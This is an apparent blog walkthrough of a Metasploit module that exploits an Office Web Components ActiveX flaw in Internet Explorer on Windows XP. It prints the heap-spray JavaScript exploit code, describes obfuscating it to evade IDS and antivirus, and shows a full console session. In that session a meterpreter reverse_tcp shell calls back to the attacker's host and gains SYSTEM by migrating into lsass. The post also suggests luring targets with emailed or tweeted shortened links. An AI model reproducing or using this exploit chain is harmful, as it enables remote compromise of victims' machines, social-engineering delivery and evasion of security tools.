Metasploit OWC ActiveX Exploit
HD Moore has released another IE 0 day Metasploit Exploit Module in less than 2 weeks The Office Web Component Exploit in Metasploit committed to the Dev 3.3 SVN will attack this vulnerability on:
- Windows XP SP0 to SP3 with IE6 or IE7 with Office XP or Office 2003 Installed
The exploit will exploit in specific the spreadsheet component of the ActiveX. the code for the whole exploit can be seen in trac.metasploit.com.
Here is a brief description of the main parts of the code that make this exploit. The exploit as done in Metasploit will create a encode key for the java payload:
@javascript_encode_key = rand_text_alpha(rand(10) + 10)
Then when a URI request is done against the listening exploit the Java code is encoded and presented to the target making this exploit very hard to detect by HIPS, IDS, AV and IPS alike. The main body of Javascript code is:
shellcode = Rex::Text.to_unescape(p.encoded)
retaddr = Rex::Text.to_unescape([target.ret].pack('V'))js = %Q|var xshellcode = unescape("#{shellcode}");
var xarray = new Array();
var xls = 0x81000-(xshellcode.length*2);var xbigblock = unescape("#{retaddr}");
while( xbigblock.length < xls / 2) { xbigblock += xbigblock; }
var xlh = xbigblock.substring(0, xls / 2);delete xbigblock;for(xi=0; xi<0x99*2; xi++) {
xarray[xi] = xlh + xlh + xshellcode;}CollectGarbage();var xobj = new ActiveXObject("OWC10.Spreadsheet");
xe = new Array();
xe.push(1);xe.push(2);xe.push(0);xe.push(window);for(xi=0;xi<xe.length;xi++){
for(xj=0;xj<10;xj++){
try { xobj.Evaluate(xe[xi]); } catch(e) { }
}}window.status = xe[3] + '';for(xj=0; xj<10; xj++){
try{ xobj.msDataSourceObject(xe[3]); } catch(e) { }
}|
Then this payload is encoded with the key and presented to the target:
# Obfuscate it up a bit
encoded_js = obfuscate_js(js,'Symbols' =>{'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj}})# Encode the javascript payload
# encoded_js = encrypt_js(encoded_js, @javascript_encode_key)
# Fire off the page to the client
send_response(cli, "<html><script language='javascript'>#{encoded_js}</script></html>")
# Handle the payload
handler(cli)
To use the exploit we must load the exploit at the msfconsole, for this example the console will be ran as root since we want to use port 80 for the exploit handler to listen to, this will help by using the default port 80 port for when doing directed attacks and there might be some filtering on the target network, we set the exploit and payload:
carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole[sudo] password for carlos:
_| | o_ _ _ _ _|_ __, , _ | | __ _|_/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| || | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_//|\|=[ msf v3.3-dev+ -- --=[ 384 exploits - 261 payloads+ -- --=[ 20 encoders - 7 nops=[ 166 auxmsf > use exploit/windows/browser/owc_spreadsheet_msdsomsf exploit(owc_spreadsheet_msdso) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(owc_spreadsheet_msdso) > set LHOST 192.168.1.158LHOST => 192.168.1.158
Know we take a look at the other options we have available for this module and we change the port to listen on to 80:
msf exploit(owc_spreadsheet_msdso) > show optionsModule options:Name Current Setting Required Description---- --------------- -------- -----------SRVHOST 0.0.0.0 yes The local host to listen on.SRVPORT 8080 yes The local port to listen on.SSL false no Use SSL
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC process yes Exit technique: seh, thread, processLHOST 192.168.1.158 yes The local addressLPORT 4444 yes The local portExploit target:Id Name-- ----0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0msf exploit(owc_spreadsheet_msdso) > set SRVPORT 80SRVPORT => 80
We know launch the exploit and make sure no errors are reported:
msf exploit(owc_spreadsheet_msdso) > exploit[*] Exploit running as background job.msf exploit(owc_spreadsheet_msdso) >[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler[*] Using URL: http://0.0.0.0:80/4fwmCRO[*] Local IP: http://192.168.1.158:80/4fwmCRO[*] Server started.
We can now send and email, tweet with URL shortened or any other method od delivery of the address to the target. Once the exploit is ran we must quickly migrate off the process since IE will hang and a user might kill the process destroying our shell:
[*] Sending Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption to 192.168.1.139:1067...[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.139:1068)msf exploit(owc_spreadsheet_msdso) > sessions -i 1[*] Starting interaction with 1...meterpreter > run migrate[*] Migrating to lsass.exe...[*] Current server process: iexplore.exe (1328)[*] New server process: lsass.exe (684)meterpreter >meterpreter > sysinfoComputer: WINXPLAB01OS : Windows XP (Build 2600, Service Pack 2).meterpreter > getuidServer username: NT AUTHORITY\SYSTEMmeterpreter >
This exploit should be done after the enumeration of the target network, preferably using metadata on documents using tools like FOCA or Metagoofil to detect the Office and OS to create the files and with this information target the attack.
UPDATE: HD Made some changes to the code removing the obfuscation since there appears to be some problems with encrypt_js and this specific exploit, either way I believe that the code description is useful for anyone looking at learning how to write exploit in Metasploit.